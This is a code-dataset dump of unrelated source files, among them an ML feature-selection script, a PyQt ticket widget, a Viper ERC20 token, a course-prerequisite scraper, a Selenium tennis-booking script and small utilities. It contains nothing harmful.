去除包含特殊字符的特定段\n special = ['shutdown']\n\n for l in group[:]:\n for s in special:\n if l.find(s) >= 0:\n group.remove(l)\n continue\n # 定义匹配模式\n tu1 = {\n '1': r'\\\\w+', # 数字字母下划线\n '2': \"[0-9a-zA-z/.:]+\", # 数字,字母斜杠.\n '3': \"[0-9a-zA-z-/. =]+\", # 加空格\n '4': \"[0-9]+\", # 数字\n }\n\n # 替换模板并提取内容\n pattern = re.compile(r'{.+?}')\n list1 = re.findall(pattern, template)\n new_list = []\n for l in list1:\n w = l.replace('{', '')\n w = w.replace('}', '')\n ll = w.split(',')\n if ll.__len__() == 1:\n template = template.replace(l, str(\"(?:\" + ll[0] + \")\"))\n\n continue\n\n if ll[1] in tu1.keys():\n ll[1] = tu1[ll[1]]\n new_list.append(ll)\n nn = list(map(lambda x: x[0], new_list))\n\n for s in new_list:\n template = re.sub(\"{\" + s[0] + \".+?}\", str(\"(\" + s[1] + \")\"), template)\n tem_list = template.split('\\n')\n results = []\n for lis in group:\n result = []\n h = 0\n for tem in tem_list:\n lenth = re.findall(re.compile(r'(\\((?!\\?:).+?\\))'), tem).__len__()\n n = re.findall(tem, lis, re.M)\n if h == 0 and n.__len__() == 0:\n break\n h += 1\n if len(n) == 0 and lenth == 1:\n result.append('')\n elif len(n) == 0 and lenth > 1:\n for i in range(lenth):\n result.append('')\n elif type(n[0]) == tuple:\n li = []\n for i in range(n[0].__len__()):\n li.append([])\n for i in range(n.__len__()):\n for j in range(n[0].__len__()):\n li[j].append(n[i][j])\n li_str = list(map(lambda x: ','.join(list(map(lambda y: str(y), x))), li))\n result.extend(li_str)\n else:\n result.append(','.join(list(map(lambda x: str(x), n))))\n\n if result.__len__() != 0:\n results.append(result)\n\n return nn, results\n","sub_path":"utils/parseUtil.py","file_name":"parseUtil.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"401671812","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ReleaseDefinitionEnvironmentSummary(Model):\n \"\"\"ReleaseDefinitionEnvironmentSummary.\n\n :param id:\n :type id: int\n :param last_releases:\n :type last_releases: list of :class:`ReleaseShallowReference `\n :param name:\n :type name: str\n \"\"\"\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'int'},\n 'last_releases': {'key': 'lastReleases', 'type': '[ReleaseShallowReference]'},\n 'name': {'key': 'name', 'type': 'str'}\n }\n\n def __init__(self, id=None, last_releases=None, name=None):\n super(ReleaseDefinitionEnvironmentSummary, self).__init__()\n self.id = id\n self.last_releases = last_releases\n self.name = name\n","sub_path":"vsts/vsts/release/v4_1/models/release_definition_environment_summary.py","file_name":"release_definition_environment_summary.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"523969675","text":"#imports\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import RFE\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import LinearSVC, SVC\nimport numpy as np\nimport pandas as pd\n\n\n#set the number of feature range and parameter C range\nfeatures_num = [5, 10, 15, 20, 30, 50, 75, 100, 250, 500, 1000, 5000]\nnum_costs = 20\ncost_range = np.logspace(-8, 2, num_costs)\n\n\n#This function performs RFE feature selection along with training Gaussian kernel SVC under 10-fold cross validation for direct data combination\n#finC_x is the common samples of gene expression data in CBE data\n#finC_y is the labels corresponding to finC_x\n#finT_x is the common samples of gene expression data in TCX data\n#finT_y is the labels corresponding to finT_x\n#return is the evaluation of model prediction accuracy\ndef rbf_svc_fs97(finC_x, finC_y, finT_x, finT_y):\n \n K = 10\n kf = KFold(n_splits=K)\n\n best_acc = []\n\n for num in features_num:\n\n print('selected num of features: ', num)\n\n dataC_x_train, dataC_x_test, dataC_y_train, dataC_y_test = train_test_split(finC_x, finC_y, test_size=0.1)\n\n dataT_x_train, dataT_x_test, dataT_y_train, dataT_y_test = train_test_split(finT_x, finT_y, test_size=0.1)\n \n estimator_c = LinearSVC()\n selector_c = RFE(estimator_c, num, step=0.1)\n new_x_c = selector_c.fit_transform(dataC_x_train, np.ravel(dataC_y_train))\n\n estimator_t = LinearSVC()\n selector_t = RFE(estimator_t, num, step=0.1)\n new_x_t = selector_t.fit_transform(dataT_x_train, np.ravel(dataT_y_train))\n\n new_x = pd.concat([pd.DataFrame(new_x_c), pd.DataFrame(new_x_t)], axis = 1)\n\n cv_accur = 0\n cv_sd = 0\n\n accur_total = 0\n accur_list = []\n\n for train_index, test_index in kf.split(new_x):\n data_x_train, data_x_test = new_x.values[train_index], new_x.values[test_index]\n data_y_train, data_y_test = finC_y.values[train_index], finC_y.values[test_index]\n data_y_train = np.ravel(data_y_train)\n data_y_test = np.ravel(data_y_test)\n\n accur = np.zeros(num_costs)\n \n for i in range(num_costs):\n model = SVC(gamma = cost_range[i], kernel = 'rbf')\n model.fit(data_x_train, data_y_train)\n pred = model.predict(data_x_test)\n accur[i] = accuracy_score(data_y_test, pred)\n \n accur_total += np.max(accur)\n accur_list.append(np.max(accur))\n \n cv_accur = accur_total/K\n cv_sd = np.std(accur_list)\n\n print('Accuracy = ', cv_accur, 'std = ', cv_sd)\n \n best_acc.append(cv_accur)\n \n return best_acc\n\n","sub_path":"rbf_svc_dir.py","file_name":"rbf_svc_dir.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"377847995","text":"#The tuples ype of data structures or containers where we can store different values in tuples\n#Tuples are very similar to the lists!\n'''\nTuples are similar to list but we can't modify them , cant add new item, or existing item\ntiple is totaly immutable.\n\n'''\n\ntuples = (1, 2, 3)\n#print(tuples.count(1))\n#print(tuples.index())\n\n#----------------------------------\ncoordinaters = (4, 5)\nprint(coordinaters[0])\n\n#coordinaters[1]=10 # we cant assing a value for tuples -->'tuple' object does not support item assignment\nprint(coordinaters[1])\n\n#----------------------\nlsCoordinators = [(4, 5), (6,7), (80, 34)]\n\n#---------------------------------------------\ncoOrdinators = (1, 2, 3)\n'''\nx = coOrdinators[0]\ny = coOrdinators[1]\nz = coOrdinators[2]\nprint(x*y*z)\n'''\n#-------------------------Unpacking in python---------------\nx, y, z = coOrdinators\nprint(x*y*z)\n","sub_path":"PythonBasicCodes/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"408243657","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtCore import QDate, Qt, QTimer, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QMessageBox\nfrom PyQt5.QtGui import QTextCharFormat\nfrom gui import TicketHelper\nfrom gui.TicketHelper import TicketStatus\n\n\nfrom ui.ui_remain_ticket_widget import Ui_remainTicketWidget\nfrom config import userData\nimport logging\nfrom eBus import request\n\n\nclass RemindTicketWidget(QWidget):\n\n\n calendarPageChanged = pyqtSignal(int, int)\n calendarClicked = pyqtSignal(QDate)\n\n def __init__(self, parent = None):\n super(RemindTicketWidget, self).__init__(parent)\n self.ui = Ui_remainTicketWidget()\n self.ui.setupUi(self)\n self.lineId = \"\"\n self.busStartTime = \"\"\n todayDate = QDate.currentDate()\n self.curDate = QDate(todayDate.year(), todayDate.month(), 1)\n self.autoRefreshTimer = None\n self.initSignals()\n self.initUI()\n\n def onSelectedBus(self, lineId : str, busStartTime : str):\n logging.info(\"select bus: %s, time: %s\" % (lineId, busStartTime))\n self.lineId = lineId\n self.busStartTime = busStartTime\n self.checkRemindTicket()\n\n\n\n def initSignals(self):\n self.ui.calendarTicket.currentPageChanged.connect(self.onCalendarPageChanged)\n self.ui.calendarTicket.currentPageChanged.connect(self.calendarPageChanged)\n self.ui.checkAutoRefresh.clicked.connect(self.onCheckAutoRefresh)\n self.ui.calendarTicket.clicked.connect(self.calendarClicked)\n\n\n def initUI(self):\n self.ui.calendarTicket.setSelectedDate(QDate(1990,1,1))\n self.ui.calendarTicket.showToday()\n hasTicketItem = self.ui.tableTicketStatusIndicator.item(0, 0)\n hasTicketItem.setText('有票')\n hasTicketItem.setBackground(TicketStatus.HasTicketText.background())\n hasTicketItem.setForeground(TicketStatus.HasTicketText.foreground())\n noneTicketItem = self.ui.tableTicketStatusIndicator.item(0, 1)\n noneTicketItem.setText('无票')\n noneTicketItem.setBackground(TicketStatus.NoneTicketText.background())\n noneTicketItem.setForeground(TicketStatus.NoneTicketText.foreground())\n bookTicketItem = self.ui.tableTicketStatusIndicator.item(0, 2)\n bookTicketItem.setText('已购')\n bookTicketItem.setBackground(TicketStatus.BookedTicketText.background())\n bookTicketItem.setForeground(TicketStatus.BookedTicketText.foreground())\n\n def setCurrentPage(self, year : int, month : int):\n self.ui.calendarTicket.setCurrentPage(year, month)\n\n\n\n def onCalendarPageChanged(self, year : int, month : int):\n logging.info(\"calendar page change year:%s, month:%s\" % (year, month))\n self.curDate.setDate(year, month, 1)\n self.checkRemindTicket()\n\n\n def checkRemindTicket(self):\n startDate = QDate(self.curDate.year(), self.curDate.month(), 1)\n remindTicketNumber, ticketPriceList = TicketHelper.getRemindTicketInfo(self.lineId,\n self.busStartTime, self.curDate.year(), self.curDate.month())\n if remindTicketNumber is None:\n return\n logging.info(\"Check remind ticket lists:\" + str(remindTicketNumber))\n logging.info(\"Check ticket price:\" + str(ticketPriceList))\n self.updateCalendarTicketStatus(startDate, remindTicketNumber, ticketPriceList)\n\n\n def updateCalendarTicketStatus(self, startDate : QDate, remindTicketList : list, ticketPrice : list):\n if startDate.isValid() == False or len(remindTicketList) == 0:\n return\n # clear all date format\n self.ui.calendarTicket.setDateTextFormat(QDate(), QTextCharFormat())\n\n for i, remindTicket in enumerate(remindTicketList):\n textFormat = QTextCharFormat()\n if ticketPrice[i] == -2:\n # already booked\n textFormat = TicketStatus.BookedTicketText\n elif ticketPrice[i] != -1:\n if remindTicket > 0:\n textFormat = TicketStatus.HasTicketText\n else:\n textFormat = TicketStatus.NoneTicketText\n self.ui.calendarTicket.setDateTextFormat(startDate, textFormat)\n startDate.setDate(startDate.year(), startDate.month(), startDate.day() + 1)\n\n def onCheckAutoRefresh(self, checked : bool):\n if checked:\n if self.autoRefreshTimer is None:\n self.autoRefreshTimer = QTimer(self)\n self.autoRefreshTimer.timeout.connect(self.onAutoRefreshTimeout)\n timeIntervalSt = self.ui.textRefreshInterval.text()\n if timeIntervalSt == \"\":\n QMessageBox.critical(self, \"Error\",'Please input time interval')\n self.ui.checkAutoRefresh.setChecked(False)\n return\n timeInterval = int(timeIntervalSt) * 1000\n self.autoRefreshTimer.setInterval(timeInterval)\n self.autoRefreshTimer.start(timeInterval)\n else:\n if not self.autoRefreshTimer is None and self.autoRefreshTimer.isActive():\n self.autoRefreshTimer.stop()\n self.ui.textRefreshInterval.setEnabled(not checked)\n\n\n def onAutoRefreshTimeout(self):\n self.checkRemindTicket()\n\n\n\n\n\n","sub_path":"gui/RemainTicketWidget.py","file_name":"RemainTicketWidget.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389787191","text":"# Solidity-Compatible ERC20 Token\n# Implements https://github.com/ethereum/EIPs/issues/20\n# Author: Phil Daian\n\n# The use of the num256 datatype as in this token is not\n# recommended, as it can pose security risks.\n\n# Events are not yet supported in Viper, so events are NOT\n# included in this token. This makes this token incompatible\n# with some log-only clients.\n\n# This token is intended as a proof of concept towards\n# language interoperability and not for production use.\n\n# To maintain compatibility with both Solidity tokens and the\n# existing ERC20 specification, this contract will throw\n# only when a non-payable function is attempted to be called\n# with some value; otherwise (on conditions like overflow),\n# false will be returned.\n\nbalances: num256[address]\nallowances: (num256[address])[address]\nnum_issued: num256\n\n# Utility functions for overflow checking\n@constant\ndef is_overflow_add(a : num256, b : num256) -> bool:\n result = num256_add(a, b)\n return num256_lt(result, a)\n\n@constant\ndef is_overflow_sub(a : num256, b : num256) -> bool:\n return num256_lt(a, b)\n\n@payable\ndef deposit():\n _value = msg.value\n _sender = msg.sender\n assert not self.is_overflow_add(self.balances[_sender], as_num256(_value))\n assert not self.is_overflow_add(self.num_issued, as_num256(_value))\n self.balances[_sender] = num256_add(self.balances[_sender], as_num256(_value))\n self.num_issued = num256_add(self.num_issued, as_num256(_value))\n # Fire deposit event\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(0), as_bytes32(_sender)], byte_value)\n\ndef withdraw(_value : num256) -> bool:\n _sender = msg.sender\n # Make sure sufficient funds are present, op will not underflow supply\n assert not self.is_overflow_sub(self.balances[_sender], _value)\n assert not self.is_overflow_sub(self.num_issued, _value)\n self.balances[_sender] = num256_sub(self.balances[_sender], _value)\n self.num_issued = num256_sub(self.num_issued, _value)\n send(_sender, as_wei_value(as_num128(_value), wei))\n # Fire withdraw event as transfer to 0x0\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(_sender), as_bytes32(0)], byte_value)\n return true\n\n@constant\ndef totalSupply() -> num256:\n return self.num_issued\n\n@constant\ndef balanceOf(_owner : address) -> num256:\n return self.balances[_owner]\n\ndef transfer(_to : address, _value : num256) -> bool:\n _sender = msg.sender\n assert not self.is_overflow_add(self.balances[_to], _value)\n assert not self.is_overflow_sub(self.balances[_sender], _value)\n self.balances[_sender] = num256_sub(self.balances[_sender], _value)\n self.balances[_to] = num256_add(self.balances[_to], _value)\n # Fire transfer event\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(_sender), as_bytes32(_to)], byte_value)\n return true\n\ndef transferFrom(_from : address, _to : address, _value : num256) -> bool:\n _sender = msg.sender\n allowance = self.allowances[_from][_sender]\n assert not self.is_overflow_add(self.balances[_to], _value)\n assert not self.is_overflow_sub(self.balances[_from], _value)\n assert not self.is_overflow_sub(allowance, _value)\n self.balances[_from] = num256_sub(self.balances[_from], _value)\n self.balances[_to] = num256_add(self.balances[_to], _value)\n self.allowances[_from][_sender] = num256_sub(allowance, _value)\n # Fire transfer event\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(_from), as_bytes32(_to)], byte_value)\n return true\n\ndef approve(_spender : address, _value : num256) -> bool:\n self.allowances[msg.sender][_spender] = _value\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Approval(address,address,uint256)\"), as_bytes32(msg.sender), as_bytes32(_spender)], byte_value)\n return true\n\n@constant\ndef allowance(_owner : address, _spender : address) -> num256:\n return self.allowances[_owner][_spender]\n\n\n","sub_path":"examples/ERC20/ERC20.v.py","file_name":"ERC20.v.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"171984775","text":"#!/usr/bin/env python3\n#Tuan Phan Nguyen\n##All of the python functions used in the project\nfrom lxml import html\nfrom bs4 import BeautifulSoup\ndef get_course_prereq(line):\n \"\"\"\n Argument: line(string) of prerequisites\n Since the name of course is not nicely formated, this function just get rid of the space between the name and course account_number\n For example : \"CS 164 and CS 171\" => \"CS164 and CS171\"\n \"\"\"\n line_list = line.split()\n result = []\n is_course_name = False\n connect_word = {\"or\": 1, \"and\": 1, \",\":1, \"[Concurrently]\":1, \"(\":1, \")\":1}\n current_name = None\n #The idea here is that we know that course name always right before course number, so we can check if the element in the list is not connect word, we can safely assume that we does not meet the course name. The first time we meet something other than the connect words, it is the course name, the second time is the course number\n #We essentially build up a new list here\n for i in range(len(line_list)):\n if line_list[i] not in connect_word:\n if current_name == None:\n current_name = line_list[i]\n else:\n result.append(current_name + line_list[i])\n else:\n current_name = None\n result.append(line_list[i])\n #Join the list and seprate by space\n return ' '.join(result)\ndef pre_process_prereq(course_prereq):\n \"\"\"\n Argument: course_prereq (array list of prereq for the course)\n Since some prerequisite courses can take concurrently with the course, we can consider that to be True => get rid of that parenthesis\n We can get rid of that because the prerequisites will always write the Concurrent courses first.\n Return the list after get right of that part\n \"\"\"\n processed_input = course_prereq.split()\n if \"[Concurrently]\" in processed_input:\n idx = processed_input.index(\"[Concurrently]\")\n processed_input = processed_input[idx+1:]\n return processed_input\n\ndef is_eligible(course_prereq, taken_course):\n \"\"\"\n Arguments: course_prereq (array list of prereq for the course) and taken_course (dictionary for taken courses)\n The idea is that from the prereq array list, we can replace the taken course by \"1\", the course that has not take by \"0\", \"and\" by \"*\", \"or\" by \"+\" and do eval to calculate if the user has enough prereq to take that course\n For example: course_prereq = [\"MATH101, \"or\", \"(\",\"CS164\", \"and\", \"CS171\", \")\" \"] and taken_course = {\"CS164\":1, \"MATH101\":1}\n After replacement, we will the list [\"1\", \"+\", \"(\", \"1\", \"*\", \"0\",\")\"]. We can join this list to get a string and do eval on that\n Return True or False (whether the user has enough preprequisites to take the class)\n \"\"\"\n connect_word = {\"or\": '+', \"and\": '*', \",\":\"+\", \"(\":\"(\", \")\":\")\"}\n #Return True if there is no prereq\n if len(course_prereq) == 0 or course_prereq[0] == \"None\":\n return True\n for i in range(len(course_prereq)):\n #If the element in the list is not in connect_word dictionary => This is a class => look up and replace with 0 and 1 properly\n if course_prereq[i] not in connect_word:\n if course_prereq[i] in taken_course:\n course_prereq[i] = \"1\"\n else:\n course_prereq[i] = \"0\"\n else:\n course_prereq[i] = connect_word[course_prereq[i]]\n #After replacement, join the list to get the string\n course_prereq_expression = \" \".join(course_prereq)\n #Try here to make sure we don't deal with really bad input, In all departments of drexel, there only 3 bad prerequisites input\n try:\n #This will evaluate that expression, if it > 1, the user has enough prerequisites for the class. If it = 0, the user does not have enough prereq\n if eval(course_prereq_expression) >= 1:\n return True\n else:\n return False\n except:\n return False\ndef get_page(resp):\n \"\"\"\n Argument: The object contains information about the GET request\n The function will get the text of the file and write it the page_text file line by line\n \"\"\"\n txt = resp.text\n soup = BeautifulSoup(txt, \"html.parser\")\n text_page = [soup.getText()]\n page_txt = open(\"page_text\", 'w')\n for line in text_page:\n line = line.encode('utf-8').strip()\n page_txt.write(line+\"\\n\")\n page_txt.close()\ndef get_courses_have_prereq(resp):\n \"\"\"\n Argument: The object contains information about the GET request\n The function will first get the title of the course in department\n Then, it will extract to get which course has prereq and write it to prereq file\n \"\"\"\n txt = resp.text\n soup = BeautifulSoup(txt, \"html.parser\")\n ##The get title of the class in p tag with courseblocktitle class\n class_title = soup.findAll('p', {\"class\": \"courseblocktitle\"})\n prereq_file = open(\"prereq\", \"w\")\n list_course = []\n #Get the course title and append to the list\n for course in class_title:\n tmp = course.getText()\n tmp = tmp.split(' ')\n ##Since the course title is formated to be something like (CS\\xa0171) I replace it with empty string to make easier to work with\n course_name = tmp[0].replace(u'\\xa0', '')\n list_course.append([course_name, None])\n index = 0\n has_prereq = None\n #The bold tag is everything like this:\n #College/Department: College of Computing and Informatics\n #Repeat Status: Not repeatable for credit\n #Prerequisites: (The course have this row only if it has prereq)\n #From these tag, I can identify which course has prerequisite which one is not\n bold_tag = soup.findAll('b')\n for i in bold_tag:\n text = i.getText()\n if text == \"College/Department:\":\n if has_prereq != None:\n list_course[index][1] = has_prereq\n index += 1\n has_prereq = False\n elif text == \"Prerequisites:\":\n has_prereq = True\n list_course[index][1] = has_prereq\n #From list of course name and list of True or False (whether a course has prereq or not), write the the file the name of course and whether it has prereq or not\n for course, has_pre in list_course:\n course_has_pre = course + \" \" + str(has_pre) + \"\\n\"\n prereq_file.write(course_has_pre)\n prereq_file.close()\n","sub_path":"src/get_prereq_project.py","file_name":"get_prereq_project.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"186540388","text":"import tensorflow as tf\nimport numpy as np\nfrom lecture_data import dataset_tr,dataset_te\nfrom network.data_process import final_data,final_labels,scaled_data_test\nimport psutil\n\n\nloaded_model = tf.keras.models.load_model('model2.h5py',compile=True)\n\n\nprint(scaled_data_test[0:1].shape)\npred = loaded_model.predict(scaled_data_test[0:1])#ça marche sah quel plaisir\nprint(pred)\n\n\"\"\"\nloaded_model.compile(\n loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"])\nloaded_model.evaluate(final_data,final_labels)#ça marche bien\n\"\"\"\n\ni=0\nwhile(i<100):\n freq_cpu = 0\n while(freq_cpu==0):\n freq_cpu=psutil.cpu_percent()\n temp_cpu = 50\n svmem = psutil.virtual_memory()[2]\n memory_used = svmem\n bytes_sent = psutil.net_io_counters().bytes_sent\n bytes_recv = psutil.net_io_counters().bytes_recv\n #to see processes\n nbre_process = 0\n\n for j in psutil.process_iter():\n nbre_process = nbre_process+1\n\n sondes = np.array([float(freq_cpu),float(memory_used),float(bytes_sent),float(bytes_recv),float(nbre_process),float(temp_cpu)])\n sondes = np.reshape(sondes,-1,6)\n sondes = sondes.astype(np.float32)\n scaled_sondes = (sondes-sondes.mean())/sondes.std()\n scaled_sondes = np.expand_dims(scaled_sondes,axis=0)\n scaled_sondes = np.expand_dims(scaled_sondes,axis=1)\n\n print(scaled_sondes)\n print(scaled_sondes.shape)\n i=int(i)+1\n pred = loaded_model.predict(scaled_sondes)\n print(pred)\n","sub_path":"load_model_evaluate.py","file_name":"load_model_evaluate.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"249198741","text":"\"\"\"\n Given a positive integer n and you can do operations as follow:\n\n If n is even, replace n with n/2.\n If n is odd, you can replace n with either n + 1 or n - 1.\n\nWhat is the minimum number of replacements needed for n to become 1?\n\nExample 1:\n\nInput:\n8\n\nOutput:\n3\n\nExplanation:\n8 -> 4 -> 2 -> 1\n\nExample 2:\n\nInput:\n7\n\nOutput:\n4\n\nExplanation:\n7 -> 8 -> 4 -> 2 -> 1\nor\n7 -> 6 -> 3 -> 2 -> 1\n\n\"\"\"\n\n#BFS\n\nclass Solution(object):\n def integerReplacement(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n\n pool = {n}\n moves = 0\n while pool:\n newX = set()\n for x in pool:\n if x == 1: return moves\n if (x % 2):\n newX.add(x + 1)\n newX.add(x - 1)\n else:\n newX.add(x / 2)\n pool |= newX\n moves += 1\n","sub_path":"integerReplacement.py","file_name":"integerReplacement.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"200901331","text":"# project aims to pull the price to book statistic of companies\n# sort through to the data and select above a certain value and\n# plot or try to make a financial benefitting graph\n\n\nimport time\nimport urllib.request\nimport pandas as pd\n\n\nsp500short = ['a', 'aa', 'aapl', 'abbv', 'abc', 'abt', 'ace', 'aci', 'acn', 'act', 'adbe', 'adi', 'adm', 'adp', 'cgm']\n\ndef yahooKeyStats(stock):\n try:\n sourceCode = urllib.request.urlopen('http://ca.finance.yahoo.com/d/quotes.csv?s=' + stock + '&f=p6').read()\n #urllib.request.urlretrieve(sourceCode, 'quote.csv')\n\n #reported_pb = pd.read_csv('quote.csv', header=None)\n pbr = sourceCode.partition('Price/Book '\n '(mrq)'\n ''\n '')[1].partion('')[0].read()\n pbr=pbr[2][4]\n print('price to book ratio', pbr)\n except Exception as e:\n print('failed in the main loop', str(e))\n\nyahooKeyStats('aapl')\n","sub_path":"Sendtex_practice/investingscript_pratice.py","file_name":"investingscript_pratice.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"285526939","text":"from sklearn.metrics import roc_auc_score\r\n\r\ndef calculate_statistics(predicted,actual):\r\n \"\"\" Calculate statistics on how a predicted distribution diverges from actual\r\n Predicted is a 0-1 array, and so is actual\r\n len(predicted) = len(actual) \"\"\"\r\n\r\n num_samples = len(predicted)\r\n\r\n accuracy = 0\r\n tp = fp = tn = fn = 0\r\n\r\n for i in range(num_samples):\r\n if predicted[i] == actual[i]:\r\n accuracy+=1\r\n if predicted[i] == 1:\r\n tp+=1\r\n else:\r\n tn+=1\r\n else:\r\n if predicted[i] == 1:\r\n fp+=1\r\n else:\r\n fn+=1\r\n\r\n accuracy/=num_samples\r\n precision = 1\r\n if(tp+fp!=0):\r\n precision = tp/(tp+fp)\r\n\r\n recall = 0\r\n if(tp+fn!=0):\r\n recall = tp/(tp+fn)\r\n\r\n if precision+recall != 0:\r\n f1 = 2*precision*recall/(precision+recall)\r\n else:\r\n f1 = 0\r\n\r\n f5 = 0\r\n if precision+recall != 0:\r\n f5 = (1+0.25) * precision*recall/(0.25*precision+recall)\r\n\r\n if tp+fn != 0 and tn+fp != 0:\r\n balanced_accuracy = ((tp/(tp+fn)) + (tn/(tn+fp))) /2\r\n\r\n try:\r\n auc = roc_auc_score(actual,predicted)\r\n except:\r\n auc = 0\r\n\r\n return {'precision':precision,'recall':recall,'accuracy':accuracy,'auc':auc,'f1':f1,'f_0.5':f5}\r\n","sub_path":"src/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"100970915","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\n\r\ndriver = webdriver.Chrome('C:/Users/simon/Python/chromedriver')\r\ndriver.get(\"https://tennis.paris.fr/tennis/jsp/site/Portal.jsp?page=tennis&view=start\")\r\nconnect_button = driver.find_element_by_id(\"button_suivi_inscription\")\r\nconnect_button.click()\r\n\r\n#Log in onto the website / A pop up appears\r\nparentWindow = driver.current_window_handle\r\nhandles = driver.window_handles\r\nfor windowHandle in handles :\r\n if (windowHandle != parentWindow):\r\n driver.switch_to_window(windowHandle);\r\n username_field = driver.find_element_by_id(\"username-login\")\r\n username_field.send_keys(\"XXX\") #Replace XXX by your email adress\r\n password_field = driver.find_element_by_id(\"password-login\")\r\n password_field.send_keys(\"XXX\") #Replace XXX by your password\r\n driver.find_element_by_xpath(\"//*[@id='form-login-account']/div/div[1]/div[2]/div[1]/button\").click() \r\n driver.switch_to_window(parentWindow)\r\n\r\n#Log in done, we go back to the website\r\ndriver.get(\"https://tennis.paris.fr/tennis/jsp/site/Portal.jsp?page=recherche&view=recherche_creneau#!\")\r\n\r\n#We input the name of the tennis court we are interested in\r\ntennisname_field = driver.find_element_by_xpath(\"//*[@id='whereToken']/li/input\")\r\ntennisname_field.send_keys(\"XXX\") #Replace XXX by the name of the tennis court you are interested in\r\ntime.sleep(1)\r\ntennisname_field.send_keys(Keys.ARROW_DOWN)\r\ntime.sleep(1)\r\ntennisname_field.send_keys(Keys.ENTER)\r\n\r\n#We input the time we are interested in\r\ndate_field = driver.find_element_by_xpath(\"//*[@id='when']\")\r\ndate_field.click()\r\ntime.sleep(1)\r\ndate_field = driver.find_element_by_xpath(\"//form[@id='search_form']/div[2]/div/div/div/div[7]/div/div[2]\")\r\ndate_field.click()\r\ndriver.find_element_by_xpath(\"//button[@id='rechercher']\").click()\r\ndriver.find_element_by_css_selector(\"#headLaFalu\\E8re21h > .panel-title\").click() #This element needs to be changed if the tennis is not \"La Faluère\"\r\ntime.sleep(1)\r\ndriver.find_element_by_css_selector(\"#collapseLaFalu\\E8re21h .row:nth-child(1) .btn\").click() #This element needs to be changed if the tennis is not \"La Faluère\"\r\n\r\n\r\nnom_field = driver.find_element_by_xpath(\"//*[@id='listPlayers']/div/div[1]/div/input\")\r\nnom_field.send_keys(\"XXX\") #Optional : replace XXX with the last name of your tennis partner\r\nprenom_field = driver.find_element_by_xpath(\"//*[@id='listPlayers']/div/div[2]/div/input\")\r\nprenom_field.send_keys(\"XXX\") #Optional : replace XXX with the first name of your tennis partner\r\ndriver.find_element_by_xpath(\"//*[@id='listPlayers']/div/div[3]/div/input\").click()\r\ndriver.find_element_by_xpath(\"//*[@id='submitControle']\").click()\r\n\r\ndriver.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/table/tbody/tr[2]/td\").click()\r\ndriver.find_element_by_xpath(\"//*[@id='submit']\").click()","sub_path":"reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"313498172","text":"import gensim\nimport os\nfrom pyvi import ViTokenizer\nfrom gensim.models.callbacks import CallbackAny2Vec\nimport string\nimport time\nimport sys\n\nimport sys\nsys.path.append('../../../')\nimport TV_Utility\n\nclass MyDocuments:\n def __init__(self, dirname, ext_filter=['.txt'], encoding='utf-8', language='vi', is_remove_stopword=True):\n self.__dirname = dirname\n self.__ext_filter = ext_filter\n self.__encoding = encoding\n self.__language = language\n self.__is_remove_stopword = is_remove_stopword\n\n\n def __iter__(self):\n \"\"\" yeild each doc and tags in dataset during train time\n Returns:\n words (list of str): tokens in a document\n [tag] (list of int): list of tag assign to document\n \"\"\"\n path_tags = self.__get_file_paths_and_tags(self.__dirname)\n for (fpath, tag) in path_tags.items():\n if not os.path.splitext(fpath)[-1] in self.__ext_filter:\n continue\n try:\n words = []\n for line in 